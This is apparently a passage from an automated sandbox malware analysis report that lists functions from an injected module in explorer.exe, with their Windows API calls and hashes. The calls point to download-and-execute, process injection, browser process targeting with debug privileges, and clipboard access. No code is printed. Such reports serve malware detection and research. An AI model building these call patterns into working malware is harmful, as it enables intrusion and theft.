                                                                                                                                                                                                                        Function 0FF4A620 Relevance: 21.1, APIs: 14, Instructions: 142stringfilenetworkCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • lstrlenA.KERNEL32 ref: 0FF4A6C2
                                                                                                                                                                                                                        • InternetCrackUrlA.WININET ref: 0FF4A6D7
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcpyA.KERNEL32 ref: 0FF46E6E
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46E7F
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46E93
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46EA7
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46EB8
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46ECC
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46EEA
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: wsprintfA.USER32 ref: 0FF46F02
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46F16
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46F2A
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46F66
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: WSAStartup.WS2_32 ref: 0FF46F76
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: socket.WS2_32 ref: 0FF46F92
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: gethostbyname.WS2_32 ref: 0FF46FA9
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: memcpy.MSVCRT ref: 0FF46FC9
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: htons.WS2_32 ref: 0FF46FD8
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: connect.WS2_32 ref: 0FF46FEF
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrlenA.KERNEL32 ref: 0FF47005
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: send.WS2_32 ref: 0FF4701B
                                                                                                                                                                                                                        • PathFindFileNameA.SHLWAPI ref: 0FF4A751
                                                                                                                                                                                                                        • GetTempPathA.KERNEL32 ref: 0FF4A76F
                                                                                                                                                                                                                        • GetTempFileNameA.KERNEL32 ref: 0FF4A785
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0FF4A795
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0FF4A7A1
                                                                                                                                                                                                                        • CreateFileA.KERNEL32 ref: 0FF4A7CA
                                                                                                                                                                                                                        • WriteFile.KERNEL32 ref: 0FF4A7EF
                                                                                                                                                                                                                        • free.MSVCRT ref: 0FF4A7FE
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0FF4A807
                                                                                                                                                                                                                        • ShellExecuteA.SHELL32 ref: 0FF4A835
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0FF4A844
                                                                                                                                                                                                                        • free.MSVCRT ref: 0FF4A84F
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$File$CloseHandleNamePathTempfreelstrlen$CrackCreateExecuteFindInternetShellStartupWriteconnectgethostbynamehtonslstrcpymemcpysendsocketwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3619236930-0
                                                                                                                                                                                                                        • Opcode ID: dd3a24cb8d624ece3b86332d21e7091f11c7b9a917e87207749051ceddd69b08
                                                                                                                                                                                                                        • Instruction ID: 29576b5333cf2e16071b3e1f6de848f907f216813759983740c014a2cded0f69
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd3a24cb8d624ece3b86332d21e7091f11c7b9a917e87207749051ceddd69b08
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F511D327146428AFB20DF65E8547AE7BA1FB88B88F844425DE4947E68DF7CD14ACB40
                                                                                                                                                                                                                        Function 0DFA2EE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 140COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DFA2E00: CreateToolhelp32Snapshot.KERNEL32 ref: 0DFA2E31
                                                                                                                                                                                                                          • Part of subcall function 0DFA2E00: Process32First.KERNEL32 ref: 0DFA2E4F
                                                                                                                                                                                                                          • Part of subcall function 0DFA2E00: Process32Next.KERNEL32 ref: 0DFA2E6F
                                                                                                                                                                                                                          • Part of subcall function 0DFA2E00: Process32Next.KERNEL32 ref: 0DFA2E97
                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0DFA2F53
                                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32 ref: 0DFA2F63
                                                                                                                                                                                                                        • LookupPrivilegeValueA.ADVAPI32 ref: 0DFA2F81
                                                                                                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32 ref: 0DFA2FA9
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0DFA2FB3
                                                                                                                                                                                                                        • OpenProcess.KERNEL32 ref: 0DFA3043
                                                                                                                                                                                                                        • OpenProcess.KERNEL32 ref: 0DFA305A
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0DFA308D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Process$OpenProcess32$CloseHandleNextToken$AdjustCreateCurrentFirstLookupPrivilegePrivilegesSnapshotToolhelp32Value
                                                                                                                                                                                                                        • String ID: SeDebugPrivilege$firefox.exe
                                                                                                                                                                                                                        • API String ID: 3464871389-4009583425
                                                                                                                                                                                                                        • Opcode ID: 92d3c017761ddc35ab4a79abf2f8234ef70817ffa4ab8ee70b46f9ae014cd1e2
                                                                                                                                                                                                                        • Instruction ID: 8a75f4702536977c42eb1e90db737b251aff2aac498e6fb4b95cb5f6ebf856ed
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 92d3c017761ddc35ab4a79abf2f8234ef70817ffa4ab8ee70b46f9ae014cd1e2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8151A662709A4295EB10EBFEE8543ED73A2BB847D8F45C4258E4E57B58EF38C509C350
                                                                                                                                                                                                                        Function 0E102EE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 140COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0E102E00: CreateToolhelp32Snapshot.KERNEL32 ref: 0E102E31
                                                                                                                                                                                                                          • Part of subcall function 0E102E00: Process32First.KERNEL32 ref: 0E102E4F
                                                                                                                                                                                                                          • Part of subcall function 0E102E00: Process32Next.KERNEL32 ref: 0E102E6F
                                                                                                                                                                                                                          • Part of subcall function 0E102E00: Process32Next.KERNEL32 ref: 0E102E97
                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0E102F53
                                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32 ref: 0E102F63
                                                                                                                                                                                                                        • LookupPrivilegeValueA.ADVAPI32 ref: 0E102F81
                                                                                                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32 ref: 0E102FA9
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0E102FB3
                                                                                                                                                                                                                        • OpenProcess.KERNEL32 ref: 0E103043
                                                                                                                                                                                                                        • OpenProcess.KERNEL32 ref: 0E10305A
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0E10308D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Process$OpenProcess32$CloseHandleNextToken$AdjustCreateCurrentFirstLookupPrivilegePrivilegesSnapshotToolhelp32Value
                                                                                                                                                                                                                        • String ID: SeDebugPrivilege$firefox.exe
                                                                                                                                                                                                                        • API String ID: 3464871389-4009583425
                                                                                                                                                                                                                        • Opcode ID: 92d3c017761ddc35ab4a79abf2f8234ef70817ffa4ab8ee70b46f9ae014cd1e2
                                                                                                                                                                                                                        • Instruction ID: f6aad6a4e42522d6ae29e066652d64090f144c3543f17a3d2feee9db98ca6d29
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 92d3c017761ddc35ab4a79abf2f8234ef70817ffa4ab8ee70b46f9ae014cd1e2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3851DA31705A4195EB14EBB2E5543ED73F2BB887C8F4048159E4E67B98EFB8CA89C340
                                                                                                                                                                                                                        Function 0FF42EE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 140COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0FF42E00: CreateToolhelp32Snapshot.KERNEL32 ref: 0FF42E31
                                                                                                                                                                                                                          • Part of subcall function 0FF42E00: Process32First.KERNEL32 ref: 0FF42E4F
                                                                                                                                                                                                                          • Part of subcall function 0FF42E00: Process32Next.KERNEL32 ref: 0FF42E6F
                                                                                                                                                                                                                          • Part of subcall function 0FF42E00: Process32Next.KERNEL32 ref: 0FF42E97
                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0FF42F53
                                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32 ref: 0FF42F63
                                                                                                                                                                                                                        • LookupPrivilegeValueA.ADVAPI32 ref: 0FF42F81
                                                                                                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32 ref: 0FF42FA9
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0FF42FB3
                                                                                                                                                                                                                        • OpenProcess.KERNEL32 ref: 0FF43043
                                                                                                                                                                                                                        • OpenProcess.KERNEL32 ref: 0FF4305A
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0FF4308D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Process$OpenProcess32$CloseHandleNextToken$AdjustCreateCurrentFirstLookupPrivilegePrivilegesSnapshotToolhelp32Value
                                                                                                                                                                                                                        • String ID: SeDebugPrivilege$firefox.exe
                                                                                                                                                                                                                        • API String ID: 3464871389-4009583425
                                                                                                                                                                                                                        • Opcode ID: 92d3c017761ddc35ab4a79abf2f8234ef70817ffa4ab8ee70b46f9ae014cd1e2
                                                                                                                                                                                                                        • Instruction ID: 897ac4f5399e50d00106b666ae19dfb41d01df38d11ec90ca0d899c33b627820
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 92d3c017761ddc35ab4a79abf2f8234ef70817ffa4ab8ee70b46f9ae014cd1e2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 23515122705B4295EB10EBB1E8543ADB761BF84BD8F8444358E4E97B59EF38E149D340
                                                                                                                                                                                                                        Function 0DFB86A0 Relevance: 10.5, APIs: 7, Instructions: 37clipboardmemoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlock
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1677084743-0
                                                                                                                                                                                                                        • Opcode ID: a76b2e309f3b88285dd0d6dc39772183be58d7e03da83df475604530b2abdef0
                                                                                                                                                                                                                        • Instruction ID: c8710dc1614214d633da9049f9a4e08e56c49ea482d1650a8affe405d9b52263
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a76b2e309f3b88285dd0d6dc39772183be58d7e03da83df475604530b2abdef0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1012821605A4282EA04ABA6B85836E7366F788FC2F48C136DF4B07769DF3CC945C754
                                                                                                                                                                                                                        Function 0E1186A0 Relevance: 10.5, APIs: 7, Instructions: 37clipboardmemoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlock
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1677084743-0
                                                                                                                                                                                                                        • Opcode ID: a76b2e309f3b88285dd0d6dc39772183be58d7e03da83df475604530b2abdef0
                                                                                                                                                                                                                        • Instruction ID: 6abea4157008be89800117afb5d8931feda953717b47c53da503763ab57e50ff
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a76b2e309f3b88285dd0d6dc39772183be58d7e03da83df475604530b2abdef0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6014F71605B8082EA15EF62F81839E63A2F749FC1F444935EE4A177A5CF3CC995C740
                                                                                                                                                                                                                        Function 0FF586A0 Relevance: 10.5, APIs: 7, Instructions: 37clipboardmemoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlock
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1677084743-0
                                                                                                                                                                                                                        • Opcode ID: a76b2e309f3b88285dd0d6dc39772183be58d7e03da83df475604530b2abdef0
                                                                                                                                                                                                                        • Instruction ID: da2ba334a1a0058712e6736f7fbf390fb5afe537e6ff38f3fd051121fb507d15
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a76b2e309f3b88285dd0d6dc39772183be58d7e03da83df475604530b2abdef0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB012C31605B4382EA24AB62B81837AB7A1FB49FC0F444135DE4A47B65CF3CD446D744
                                                                                                                                                                                                                        Function 0DFA9920 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86injectionmemorythreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Virtual$AllocCreateMemoryProcessProtectRemoteThreadWrite
                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                        • API String ID: 1113946311-2766056989
                                                                                                                                                                                                                        • Opcode ID: 87caab480a9102b640f6cefad6e7ae02b6310e746fb377fb73e684b20f000eaf
                                                                                                                                                                                                                        • Instruction ID: 99dc1339e41d07b3b6572255553169257703a7ab0ac97c53937e8429fa700fd9
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 87caab480a9102b640f6cefad6e7ae02b6310e746fb377fb73e684b20f000eaf
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB21C37671468085DB21DF1AB90076BB669FB88FD4F88C03A9E8D4BB14DF78C049CB00
                                                                                                                                                                                                                        Function 0E109920 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86injectionmemorythreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Virtual$AllocCreateMemoryProcessProtectRemoteThreadWrite
                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                        • API String ID: 1113946311-2766056989
                                                                                                                                                                                                                        • Opcode ID: 87caab480a9102b640f6cefad6e7ae02b6310e746fb377fb73e684b20f000eaf
                                                                                                                                                                                                                        • Instruction ID: 72cde7bc65f10d941dbc4ef8abcbcf79ccc90186e20ef323d0056364e60fe3c6
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 87caab480a9102b640f6cefad6e7ae02b6310e746fb377fb73e684b20f000eaf
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2121F53231568086DB24DF16B92079AB6A9FBC8FC4F4480259E8C43B55DF7CC589C700
                                                                                                                                                                                                                        Function 0FF49920 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86injectionmemorythreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Virtual$AllocCreateMemoryProcessProtectRemoteThreadWrite
                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                        • API String ID: 1113946311-2766056989
                                                                                                                                                                                                                        • Opcode ID: 87caab480a9102b640f6cefad6e7ae02b6310e746fb377fb73e684b20f000eaf
                                                                                                                                                                                                                        • Instruction ID: 6a5947ed90fd8e66a0b669341c301c70b6a4b76e789c919bfd3695b10ab2464a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 87caab480a9102b640f6cefad6e7ae02b6310e746fb377fb73e684b20f000eaf
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C921B17671478185DB31DF16A900BABBA68FF88FD4F8481299E8C43B15DF78D089C700
                                                                                                                                                                                                                        Function 0DFB84B0 Relevance: 7.5, APIs: 5, Instructions: 42clipboardCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1006321803-0
                                                                                                                                                                                                                        • Opcode ID: f7f0e950452672c33b53b7a7d6ae0d4df301492d08b3e6fd7bb59d6e7e239ab6
                                                                                                                                                                                                                        • Instruction ID: 6abf23018d9a990ba44cccaa833b7c598f590bf724c77d1f4ed04c4bc577a4c8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f7f0e950452672c33b53b7a7d6ae0d4df301492d08b3e6fd7bb59d6e7e239ab6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F401BC21B15B4282EE089F6AB8443796366AB88FD0F0C903ADE1B07768EF38C141C714
                                                                                                                                                                                                                        Function 0DED1125 Relevance: 6.7, APIs: 5, Instructions: 411COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • malloc.LIBCMT ref: 0DED11AD
                                                                                                                                                                                                                          • Part of subcall function 0DEED4B1: _NMSG_WRITE.LIBCMT ref: 0DEED4EB
                                                                                                                                                                                                                          • Part of subcall function 0DEED4B1: _callnewh.LIBCMT ref: 0DEED51F
                                                                                                                                                                                                                          • Part of subcall function 0DEED4B1: _errno.LIBCMT ref: 0DEED52A
                                                                                                                                                                                                                          • Part of subcall function 0DEED4B1: _errno.LIBCMT ref: 0DEED535
                                                                                                                                                                                                                        • free.LIBCMT ref: 0DED1544
                                                                                                                                                                                                                        • free.LIBCMT ref: 0DED154C
                                                                                                                                                                                                                        • free.LIBCMT ref: 0DED1554
                                                                                                                                                                                                                        • free.LIBCMT ref: 0DED155D
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692158037.000000000DED0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ded0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$_errno$_callnewhmalloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2761444284-0
                                                                                                                                                                                                                        • Opcode ID: 89003d18724c760acf33120327dc08f5968b530597684a6895f375dd43fdf9cc
                                                                                                                                                                                                                        • Instruction ID: b36f2a9f4c55e26e41882b26bcfbf5c97f00797fd723e9a59141c31261fe940f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 89003d18724c760acf33120327dc08f5968b530597684a6895f375dd43fdf9cc
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29D1423061CB488FEB69EF28D8596AA77E1FB98305F10162EE44BD7250DF78D506CB81
                                                                                                                                                                                                                        Function 08221125 Relevance: 6.7, APIs: 5, Instructions: 411COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • malloc.LIBCMT ref: 082211AD
                                                                                                                                                                                                                          • Part of subcall function 0823D4B1: _NMSG_WRITE.LIBCMT ref: 0823D4EB
                                                                                                                                                                                                                          • Part of subcall function 0823D4B1: _callnewh.LIBCMT ref: 0823D51F
                                                                                                                                                                                                                          • Part of subcall function 0823D4B1: _errno.LIBCMT ref: 0823D52A
                                                                                                                                                                                                                          • Part of subcall function 0823D4B1: _errno.LIBCMT ref: 0823D535
                                                                                                                                                                                                                        • free.LIBCMT ref: 08221544
                                                                                                                                                                                                                        • free.LIBCMT ref: 0822154C
                                                                                                                                                                                                                        • free.LIBCMT ref: 08221554
                                                                                                                                                                                                                        • free.LIBCMT ref: 0822155D
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2680336364.0000000008220000.00000040.00000001.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_8220000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$_errno$_callnewhmalloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2761444284-0
                                                                                                                                                                                                                        • Opcode ID: 89003d18724c760acf33120327dc08f5968b530597684a6895f375dd43fdf9cc
                                                                                                                                                                                                                        • Instruction ID: 4044cbba437d037ac694190a19df1962384e102813606170f2ee078bc363c641
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 89003d18724c760acf33120327dc08f5968b530597684a6895f375dd43fdf9cc
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3D13331618B588FDB68EF28D8596AE77E1FB98305F10062EE44BC7250DF74E516CB81
                                                                                                                                                                                                                        Function 0E081125 Relevance: 6.7, APIs: 5, Instructions: 411COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • malloc.LIBCMT ref: 0E0811AD
